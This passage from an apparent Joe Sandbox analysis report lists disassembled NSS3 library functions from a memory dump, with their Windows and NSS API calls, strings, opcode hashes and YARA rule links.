                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CFBBDEC
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CFBBE03
                                                                                  • Part of subcall function 6D00FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D008D2D,?,00000000,?), ref: 6D00FB85
                                                                                  • Part of subcall function 6D00FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D00FBB1
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFBBE22
                                                                                • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFBBE30
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CFBBE3B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                • String ID:
                                                                                • API String ID: 1821307800-0
                                                                                • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                • Instruction ID: 5cfd12595686087e590d52b2071fad830a50818b3cfffc9af1cc9178c1992dd5
                                                                                • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                • Instruction Fuzzy Hash: 82012B66A4820276F61022A76C01F5B26484F5128DF150130FF04A7282FBA4E12082F6
                                                                                Function 6D0A1C40 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 45COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CFA3D77,?,?,6CFA4E1D), ref: 6D0A1C8A
                                                                                • sqlite3_free.NSS3(00000000), ref: 6D0A1CB6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_freesqlite3_mprintf
                                                                                • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                • API String ID: 1840970956-3705377941
                                                                                • Opcode ID: 9440d855b5e8eccf2d6ad5632a152ac31da00e630476ceea74001042268b0f17
                                                                                • Instruction ID: 730eb4d9a094e09f28897e3c7f3b1615c124473ee3729942caacbb14dc103868
                                                                                • Opcode Fuzzy Hash: 9440d855b5e8eccf2d6ad5632a152ac31da00e630476ceea74001042268b0f17
                                                                                • Instruction Fuzzy Hash: 7001F7B5A001405FE700AB6CD401EB177E6EFC638CB15486DED49DB743EB32E8568792
                                                                                Function 6D01ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6D01ED6B
                                                                                • PORT_Alloc_Util.NSS3(00000000), ref: 6D01EDCE
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • free.MOZGLUE(00000000,?,?,?,?,6D01B04F), ref: 6D01EE46
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6D01EECA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6D01EEEA
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6D01EEFB
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                • String ID:
                                                                                • API String ID: 3768380896-0
                                                                                • Opcode ID: 29d336bc5ee2284faa00c2341dced47fc08115d02df486b3d0cdde648baef5a7
                                                                                • Instruction ID: caf482bde4a09567aa21e1f9ee670731fd5a1432dbeb9c85855b2f07976d6c59
                                                                                • Opcode Fuzzy Hash: 29d336bc5ee2284faa00c2341dced47fc08115d02df486b3d0cdde648baef5a7
                                                                                • Instruction Fuzzy Hash: 6A8136B5A082069FEB14CF99DC84BAE7BF5FF88704F044428E9259B651DB70E914CBA1
                                                                                Function 6D043C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6D045B40: PR_GetIdentitiesLayer.NSS3 ref: 6D045B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D043D3F
                                                                                  • Part of subcall function 6CFBBA90: PORT_NewArena_Util.NSS3(00000800,6D043CAF,?), ref: 6CFBBABF
                                                                                  • Part of subcall function 6CFBBA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6D043CAF,?), ref: 6CFBBAD5
                                                                                  • Part of subcall function 6CFBBA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6D043CAF,?), ref: 6CFBBB08
                                                                                  • Part of subcall function 6CFBBA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6D043CAF,?), ref: 6CFBBB1A
                                                                                  • Part of subcall function 6CFBBA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6D043CAF,?), ref: 6CFBBB3B
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D043CCB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790AB
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D0790C9
                                                                                  • Part of subcall function 6D079090: EnterCriticalSection.KERNEL32 ref: 6D0790E5
                                                                                  • Part of subcall function 6D079090: TlsGetValue.KERNEL32 ref: 6D079116
                                                                                  • Part of subcall function 6D079090: LeaveCriticalSection.KERNEL32 ref: 6D07913F
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D043CE2
                                                                                • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D043CF8
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D043D15
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D043D2E
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
                                                                                • String ID:
                                                                                • API String ID: 4030862364-0
                                                                                • Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                • Instruction ID: 9b78cb70815076d83a4f2e631fe28b9fd5d6868e4fca475600446c622682f6e3
                                                                                • Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
                                                                                • Instruction Fuzzy Hash: BB1134B5A54600AFF7304A65FC81F5BB3F8AB29218F409534E90A8B220E632F815C342
                                                                                Function 6D00FDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D00FE08
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D00FE1D
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01116E
                                                                                • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D00FE29
                                                                                • PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D00FE3D
                                                                                • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D00FE62
                                                                                • free.MOZGLUE(00000000,?,?,?,?), ref: 6D00FE6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 660648399-0
                                                                                • Opcode ID: 0cf1cba09983196e5a9e498f563e99bf281e155f98d0852e704ab91696f68e74
                                                                                • Instruction ID: 2d748f4880c2754373cf706cc6058fd7c2925cdf39b980df8a3be1892dbaa6aa
                                                                                • Opcode Fuzzy Hash: 0cf1cba09983196e5a9e498f563e99bf281e155f98d0852e704ab91696f68e74
                                                                                • Instruction Fuzzy Hash: 351125B6A08342BBFB009B55DC40B2B7BDCAF14295F058138EA1887212E731E910CB95
                                                                                Function 6D0BFD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_Lock.NSS3 ref: 6D0BFD9E
                                                                                  • Part of subcall function 6D079BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CFA1A48), ref: 6D079BB3
                                                                                  • Part of subcall function 6D079BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CFA1A48), ref: 6D079BC8
                                                                                • PR_WaitCondVar.NSS3(000000FF), ref: 6D0BFDB9
                                                                                  • Part of subcall function 6CF9A900: TlsGetValue.KERNEL32(00000000,?,6D1114E4,?,6CF34DD9), ref: 6CF9A90F
                                                                                  • Part of subcall function 6CF9A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CF9A94F
                                                                                • PR_Unlock.NSS3 ref: 6D0BFDD4
                                                                                • PR_Lock.NSS3 ref: 6D0BFDF2
                                                                                • PR_NotifyAllCondVar.NSS3 ref: 6D0BFE0D
                                                                                • PR_Unlock.NSS3 ref: 6D0BFE23
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                • String ID:
                                                                                • API String ID: 3365241057-0
                                                                                • Opcode ID: 427884cee314b9662647f12e3fe49a19ae1bb2029cf5c4752fcf7f656ff65127
                                                                                • Instruction ID: 340d9b5152e45d7668897bdf600bacb1d81a7d55862f03604a550d97631f00a6
                                                                                • Opcode Fuzzy Hash: 427884cee314b9662647f12e3fe49a19ae1bb2029cf5c4752fcf7f656ff65127
                                                                                • Instruction Fuzzy Hash: DE01E5BAD081219BEF044F25FD01A19BA71FB226287114334E934476E2E733DD64C6C1
                                                                                Function 6CFFFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CFFFC55
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CFFFCB2
                                                                                • PR_SetError.NSS3(FFFFE040,00000000), ref: 6CFFFDB7
                                                                                • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CFFFDDE
                                                                                  • Part of subcall function 6D008800: TlsGetValue.KERNEL32(?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008821
                                                                                  • Part of subcall function 6D008800: TlsGetValue.KERNEL32(?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D00883D
                                                                                  • Part of subcall function 6D008800: EnterCriticalSection.KERNEL32(?,?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008856
                                                                                  • Part of subcall function 6D008800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6D008887
                                                                                  • Part of subcall function 6D008800: PR_Unlock.NSS3(?,?,?,?,6D01085A,00000000,?,6CFB8369,?), ref: 6D008899
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                • String ID: pkcs11:
                                                                                • API String ID: 362709927-2446828420
                                                                                • Opcode ID: 116235fc319cd5746b288b6fd6f21eac0f8a4b1b829a2e7d56e9e8606f501ba2
                                                                                • Instruction ID: b64d0a39215038655ffda7486d1d3328405ae166f9e8e9740680df86cc2d2afe
                                                                                • Opcode Fuzzy Hash: 116235fc319cd5746b288b6fd6f21eac0f8a4b1b829a2e7d56e9e8606f501ba2
                                                                                • Instruction Fuzzy Hash: 3151C472A04121ABFB509F65DD41F5E37B5EF41358F150024DE256BAB2EB70E902CBA2
                                                                                Function 6CF3BDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memcmp.VCRUNTIME140(00000000,?,?), ref: 6CF3BE02
                                                                                  • Part of subcall function 6D069C40: memcmp.VCRUNTIME140(?,00000000,6CF3C52B), ref: 6D069D53
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF3BE9F
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF3BE89
                                                                                • database corruption, xrefs: 6CF3BE93
                                                                                • %s at line %d of [%.10s], xrefs: 6CF3BE98
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 1135338897-598938438
                                                                                • Opcode ID: 31b2177fe6ff324ab5b50213afd72d2daca91c54204021d8ef17c7efb593204f
                                                                                • Instruction ID: 64f2f29daa4b54bbe3297e53de5d1f66d4d7b76825edf01df9bc9b0c010092c7
                                                                                • Opcode Fuzzy Hash: 31b2177fe6ff324ab5b50213afd72d2daca91c54204021d8ef17c7efb593204f
                                                                                • Instruction Fuzzy Hash: 5F315931A08A65ABC700DF6DC8B4BEBBBA1AF41314B199954EE5C5B6C1D370ED80C7D0
                                                                                Function 6CFA0DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CFA0BDE), ref: 6CFA0DCB
                                                                                • strrchr.VCRUNTIME140(00000000,0000005C,?,6CFA0BDE), ref: 6CFA0DEA
                                                                                • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CFA0BDE), ref: 6CFA0DFC
                                                                                • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CFA0BDE), ref: 6CFA0E32
                                                                                Strings
                                                                                • %s incr => %d (find lib), xrefs: 6CFA0E2D
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: strrchr$Print_stricmp
                                                                                • String ID: %s incr => %d (find lib)
                                                                                • API String ID: 97259331-2309350800
                                                                                • Opcode ID: 80893f83c8075523f127b4c0c809e52d45b6debe83f3494a89045da1a3feed0c
                                                                                • Instruction ID: 6ff754fec3c436ace5e3d104eeff907f72f35a6029dee79c8c2e489b07f17b2e
                                                                                • Opcode Fuzzy Hash: 80893f83c8075523f127b4c0c809e52d45b6debe83f3494a89045da1a3feed0c
                                                                                • Instruction Fuzzy Hash: F201D472640210DFE6209FA5AC86F17B3ACDF45A09B05446DEA0AD3641E7E2EC15CBA1
                                                                                Function 6CF49C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CF49CF2
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CF49D45
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 6CF49D8B
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 6CF49DDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID:
                                                                                • API String ID: 3168844106-0
                                                                                • Opcode ID: 34fd74b342732f57fd8306da4b1f0ca226c00ddc9132be3d96078dba139b7e29
                                                                                • Instruction ID: e20e5970011961768c8851c29e0e11234243d48c0f38dad94c8c8c119c104fd0
                                                                                • Opcode Fuzzy Hash: 34fd74b342732f57fd8306da4b1f0ca226c00ddc9132be3d96078dba139b7e29
                                                                                • Instruction Fuzzy Hash: 8AA105B17041018BEB08EFA1FF8976E3B79BB47718F08802CD81687A46DF759A41CB52
                                                                                Function 6D05DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6D05DD8C
                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DDB4
                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 6D05DE1B
                                                                                • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6D05DE77
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                • String ID:
                                                                                • API String ID: 2700453212-0
                                                                                • Opcode ID: 2e429a75cf8d4a43151271d9ce2ec7afd521f48a4ea564951429ac543f47eee6
                                                                                • Instruction ID: 44d646b0ebdeafdd2897c6d9dcfdea613ec0a4451d63e09f8885a08f543b0692
                                                                                • Opcode Fuzzy Hash: 2e429a75cf8d4a43151271d9ce2ec7afd521f48a4ea564951429ac543f47eee6
                                                                                • Instruction Fuzzy Hash: F5715475A00319CBEB10DF9AC68079AB7F5BF89714F15806ECD596B302DB70A961CFA0
                                                                                Function 6CFAEDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32 ref: 6CFAEDFD
                                                                                • calloc.MOZGLUE(00000001,00000000), ref: 6CFAEE64
                                                                                • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CFAEECC
                                                                                • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CFAEEEB
